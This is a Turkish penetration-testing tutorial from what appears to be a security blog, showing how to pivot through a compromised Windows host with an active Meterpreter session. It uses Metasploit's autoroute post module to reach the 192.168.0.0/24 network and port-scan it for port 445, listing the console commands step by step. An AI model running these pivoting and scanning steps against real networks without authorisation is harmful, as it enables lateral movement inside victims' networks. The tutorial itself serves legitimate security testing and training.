MSF autoroute Post Modülü Kullanılarak Meterpreter Bağlantısı Elde Edilen Bilgisayar Üzerinden Başka Bir Ağa Erişimin Sağlanması

Sızma testleri sırasında Meterpreter ile bağlantı kurulabilmiş olan bir bilgisayarın farklı ağlara olan erişimi olup olmadığı kontrol edilirek yeni ağlara erişim sağlanır. Bu yazıda, MSF autoroute post modülü kullanılarak, Meterpreter erişimi elde edilmiş bir Windows istemci üzerinden başka bir ağa erişim sağlanacak ve mevcut Meterpreter oturumu üzerinden ağ taraması gerçekleştirilecektir.

Bu yazıda saldırgana ait olan Kali bilgisayarın tek bir IP adresi olup bu adres 10.0.0.50’dir. Meterpreter ile erişim elde edilen Windows bilgisayarın ise, 2 ayrı ağa ait olan iki IP değeri vardır. Birincisi, saldırganın istismar ederken erişebildiği 10.0.0.25 IP adresidir. İkincisi ise, saldırgan tarafından direk olarak erişim sağlanamayan 192.168.0.80 IP adresidir.

ifconfig

pivoting-by-using-msf-autoroute-post-module-01

Windows istemci üzerinden 192.168.0.0/24 ağına erişim sağlamak için MSF autoroute post modülü kullanılabilir. Bu amaçla, modül seçilir ve seçenekleri incelenir.

background
route print
search autoroute
use post/windows/manage/autoroute
show options

pivoting-by-using-msf-autoroute-post-module-02

Modüle oturum ID değeri ve erişim sağlanacak ağın bilgisi verilerek modül çalışıtırılır ve yönlendirme tablosuna yeni bir girdi eklenmiş olur.

set SESSION 1
set SUBNET 192.168.0.0/24
show options
run
route print

pivoting-by-using-msf-autoroute-post-module-03

Not: MSF autoroute post modülü ile benzer işlevde olan Meterpreter autoroute betiği de bulunmaktadır. Ancak Meterpreter betiği yerine MSF post modülünün kullanılması tavsiye edilmektedir.

sessions -i 1
run autoroute -h
run autoroute -p

pivoting-by-using-msf-autoroute-post-module-04

Meterpreter oturumunda yönlendirme tablosuna yeni girdi yapılmasıyla, 192.168.0.0/24 ağına gidecek taleplerin mevcut Meterpreter bağlantısı üzerinden gitmesi sağlanmıştır. Bu durumda gerçekleştirilecek olan MSF tcp auxiliary modülü ile port taraması, Meterpreter üzerinden geçecektir. Port taraması için modül seçilir, modüle tarama parametreleri verilir ve modül seçenekleri incelenir.

background
use auxiliary/scanner/portscan/tcp
set PORTS 445
set RHOSTS 192.168.0.0/24
set THREADS 50
show options

pivoting-by-using-msf-autoroute-post-module-05

Böylece, Meterpreter üzerinden başka bir ağda tarama işlemi gerçekleştirilebilir.

run

pivoting-by-using-msf-autoroute-post-module-06

 

Yazarın Bilgileri

Ertuğrul BAŞARANOĞLU
Ertuğrul BAŞARANOĞLU

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Kullanabileceğiniz HTLM etiketleri ve özellikleri: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">

Bu sayfada incelenen konulardan doğacak sorunlar kişinin kendi sorumluluğundadır.